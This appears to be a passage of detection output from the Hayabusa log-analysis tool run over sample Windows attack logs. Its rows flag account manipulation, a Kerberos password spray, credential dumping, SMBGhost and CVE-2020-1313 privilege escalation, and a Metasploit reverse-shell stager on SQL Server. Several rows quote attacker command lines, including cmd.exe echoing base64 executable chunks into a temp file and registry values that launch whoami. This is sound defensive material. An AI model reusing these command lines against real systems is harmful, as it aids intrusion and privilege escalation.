| LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.578 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.580 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.580 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.582 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.582 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:27:05.579 +00:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 05:28:26.831 +00:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 06:01:13.758 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 06:01:13.758 +00:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 19:45:00.670 +00:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-12 19:45:00.670 +00:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 08:34:13.253 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-13 08:34:33.915 +00:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 13:06:52.199 +00:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-22 20:29:27.321 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.414 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.415 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.415 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.434 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-22 20:29:36.437 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-24 17:20:29.872 +00:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx +2020-07-26 22:26:14.522 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:14.523 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:14.523 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:15.141 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:15.141 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-26 22:26:15.141 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 14:06:52.015 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.443 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.445 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.721 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.723 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 